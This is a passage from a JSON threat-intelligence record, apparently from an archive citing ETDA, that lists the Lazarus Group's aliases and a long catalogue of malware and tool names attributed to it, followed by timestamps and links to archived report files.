				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434271,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ce054cf44ff8f515508a7f77b72ea6edd24fa5a1.pdf",
		"text": "https://archive.orkl.eu/ce054cf44ff8f515508a7f77b72ea6edd24fa5a1.txt",
		"img": "https://archive.orkl.eu/ce054cf44ff8f515508a7f77b72ea6edd24fa5a1.jpg"
	}
}